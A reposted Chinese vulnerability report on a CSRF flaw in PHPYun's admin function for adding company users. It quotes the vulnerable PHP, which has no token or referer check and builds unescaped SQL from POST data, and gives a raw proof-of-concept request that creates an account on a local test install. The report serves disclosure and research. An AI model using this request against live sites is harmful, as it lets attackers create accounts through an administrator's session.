phpyun#csrf添加企业用户 没穿底裤 714文章 0评论 2020年1月1日03:38:58评论357 views字数 3240阅读10分48秒阅读模式 摘要Xser出现在/admin/model/admin_company.class.php中没有验证token还有refer 所以导致csrf,本地测试下 提交请求包 漏洞作者: Xser 详细说明: 出现在/admin/model/admin_company.class.php中 function add_action(){ $rating_list = $this->obj->DB_select_all("company_rating","`category`=1"); if($_POST['submit']) { extract($_POST); if($username==""||strlen($username)<2||strlen($username)>15) { $msg = "会员名不能为空或不符合要求!"; }elseif($password==""||strlen($username)<2||strlen($username)>15){ $msg = "密码不能为空或不符合要求!"; }elseif($email==""){ $msg = "email不能为空!"; }else{ if($this->config['sy_uc_type']=="uc_center"){ $this->obj->uc_open(); $user = uc_get_user($username); }else{ $user = $this->obj->DB_select_once("member","`username`='$username' OR `email`='$email'"); } if(is_array($user)) { $msg = "用户名或邮箱已存在!"; }else{ $ip = $this->obj->fun_ip_get(); $time = time(); if($this->config['sy_uc_type']=="uc_center") { $uid=uc_user_register($_POST['username'],$_POST['password'],$_POST['email']); if($uid<0) { $this->obj->get_admin_msg("index.php?m=com_member&c=add","该邮箱已存在!"); }else{ list($uid,$username,$email,$password,$salt)=uc_get_user($username); $value = "`username`='$username',`password`='$password',`email`='$email',`usertype`='2',`address`='$address',`status`='$status',`salt`='$salt',`moblie`='$moblie',`reg_date`='$time',`reg_ip`='$ip'"; } }else{ $salt = substr(uniqid(rand()), -6); $pass = md5(md5($password).$salt); $value = "`username`='$username',`password`='$pass',`email`='$email',`usertype`='2',`address`='$address',`status`='$status',`salt`='$salt',`moblie`='$moblie',`reg_date`='$time',`reg_ip`='$ip'"; } $nid = $this->obj->DB_insert_once("member",$value); $new_info = $this->obj->DB_select_once("member","`username`='$username'"); $uid = $new_info['uid']; if($uid>0) { $this->obj->DB_insert_once("company","`uid`='$uid',`name`='$name',`linktel`='$moblie',`linkmail`='$email',`address`='$address'"); $rat_arr = @explode("+",$rating_name); $value = "`uid`='$uid',"; $value.=$this->rating_info($rat_arr[0]); $this->obj->DB_insert_once("company_statis",$value); $this->obj->DB_insert_once("friend_info","`uid`='$uid',`nickname`='$name',`usertype`='2'"); $msg="会员(ID:".$uid.")添加成功"; } } } if($_POST['type']){ echo "<script type='text/javascript'>window.location.href='index.php?m=admin_company_job&c=show&uid=".$nid."'</script>";die; }else{ $this->obj->ACT_layer_msg($msg,9,"index.php?m=admin_company",2,1); } 没有验证token还有refer 所以导致csrf,本地测试下 提交请求包 POST /phpyun/phpyun/upload/admin/index.php?m=admin_company&c=add HTTP/1.1 Host: 127.0.0.1 Proxy-Connection: keep-alive Content-Length: 211 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://127.0.0.1/phpyun/phpyun/upload/admin/index.php?m=admin_company&c=add Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8 Cookie: Hm_lvt_2a935166b0c9b73fef3c8bae58b95fe4=1411140464; bdshare_firstime=1411271506008; PHPSESSID=a65b349c297eaf372de3b329d7220db4; friend=0; friend_message=0; sysmsg=0; ashell=c0e024d9200b5705bc4804722636378a; remind_num=0 rating_name=3%2B%C3%E2%B7%D1%BB%E1%D4%B1&username=xssss&password=123456&email=10088055%40qq.com&moblie=132863&name=xss&address=xss&status=1&submit=%26%23160%3B%CC%ED+%BC%D3%26%23160%3B&pytoken=ebf2387fb39c&type= 构造表单就可以csrf了 如图 成功添加 修改用户资料那里也存在,就不一一提交了,在这里也随便提示了 免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。 点赞 https://cn-sec.com/archives/76225.html 复制链接 复制链接 左青龙 微信扫一扫 右白虎 微信扫一扫
评论